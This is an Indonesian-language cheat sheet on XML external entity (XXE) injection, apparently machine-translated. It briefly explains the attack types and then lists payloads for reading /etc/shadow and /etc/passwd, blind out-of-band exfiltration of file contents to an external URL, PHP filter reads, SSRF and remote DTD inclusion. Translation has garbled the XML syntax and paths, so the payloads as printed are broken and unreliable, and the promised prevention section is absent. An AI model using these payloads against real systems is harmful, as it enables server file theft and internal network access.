Entri Eksternal XML (Entitas Eksternal (XXE))
oleh Priyanshu Sahay
Lembar Cheat Payload Injeksi XXE
Entitas Eksternal XML (XXE) Daftar Muatan Injeksi
Dalam artikel ini, kami akan menjelaskan apa itu injeksi entitas eksternal XML, dan contoh umum mereka, menjelaskan bagaimana menemukan dan mengeksploitasi berbagai jenis injeksi XXE, dan merangkum cara mencegah serangan injeksi XXE.
Serangan XML dapat mencakup pengungkapan file lokal, yang mungkin berisi data sensitif seperti kata sandi atau data pengguna pribadi, menggunakan file: skema atau jalur relatif di pengidentifikasi sistem.
Karena serangan itu terjadi relatif terhadap aplikasi yang memproses dokumen XML, penyerang dapat menggunakan aplikasi tepercaya ini untuk berporos ke sistem internal lain, mungkin mengungkapkan konten internal lainnya melalui permintaan (http) atau meluncurkan serangan CSRF ke layanan internal yang tidak dilindungi.
Dalam beberapa situasi, pustaka prosesor XML yang rentan terhadap masalah korupsi memori sisi klien dapat dieksploitasi dengan mendereferensi URI berbahaya, mungkin memungkinkan eksekusi kode arbitrer di bawah akun aplikasi.
Serangan lain dapat mengakses sumber daya lokal yang mungkin tidak menghentikan pengembalian data, mungkin memengaruhi ketersediaan aplikasi jika terlalu banyak utas atau proses tidak dirilis.
Apa itu injeksi entitas eksternal XML?
Injeksi entitas eksternal XML (juga dikenal sebagai XXE) adalah kerentanan keamanan web yang memungkinkan penyerang mengganggu pemrosesan data XML aplikasi. Seringkali memungkinkan penyerang untuk melihat file pada sistem file server aplikasi, dan untuk berinteraksi dengan sistem backend atau eksternal yang dapat diakses oleh aplikasi itu sendiri.
Dalam beberapa situasi, penyerang dapat meningkatkan serangan XXE untuk mengkompromikan server yang mendasarinya atau infrastruktur backend lainnya, dengan memanfaatkan kerentanan XXE untuk melakukan serangan pemalsuan permintaan sisi-server (SSRF).
Ada berbagai jenis serangan XXE:
Memanfaatkan XXE untuk Mengambil File
Di mana entitas eksternal didefinisikan berisi konten file, dan dikembalikan sebagai respons aplikasi.
Memanfaatkan XXE untuk Melakukan Serangan SSRF
Di mana entitas eksternal ditentukan berdasarkan URL ke sistem back-end.
Mengeksploitasi Blind XXE Exfiltrate Data Out-of-Band
Di mana data sensitif ditransmisikan dari server aplikasi ke sistem yang dikendalikan oleh penyerang.
Memanfaatkan blind XXE untuk Mengambil Data Melalui Pesan Kesalahan
Di mana penyerang dapat memicu pesan kesalahan parsing yang berisi data sensitif.
XML External Entity (XXE) Muatan Injeksi adalah sebagai berikut-
XXE: Contoh XML Dasar
<! -? xml version = "1.0"? ->
XXE: Contoh Entitas
<! -? xml version = "1.0"? -> <! DOCTYPE ganti [<! ENTITY contoh "Doe">]>
XXE: Pengungkapan File
<! -? xml version = "1.0"? -> <! DOCTYPE ganti [<! ENTITY ent SYSTEM "file: /// etc / shadow">]>
XXE: Contoh Penyertaan File Lokal
<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY xxe SYSTEM "file: /// etc / passwd">]>
XXE: Contoh Penyertaan File Lokal Buta (Ketika case pertama tidak mengembalikan apa-apa).
<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY% xxe SYSTEM "file: /// etc / passwd"> <! ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]>
XXE: Akses Kontrol Bypass (Memuat Sumber Daya Terbatas - contoh PHP)
<! DOCTYPE foo [ <! ENTITY ac SYSTEM "php: //filter/read=convert.base64-encode/resource=http: //example.com/viewlog.php">]>
XXE: Contoh SSRF (Pemalsuan Permintaan Sisi Server)
<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY xxe SYSTEM "https://www.example.com/text.txt">]>
XXE: (Serangan Jarak Jauh - Melalui Penyertaan Xml Eksternal) Contoh
<! DOCTYPE lolz [ <! SISTEM uji ENTITY "https://example.com/entity1.xml">]>
XXE: XXE di dalam SOAP Contoh
XXE: XXE di dalam SVG
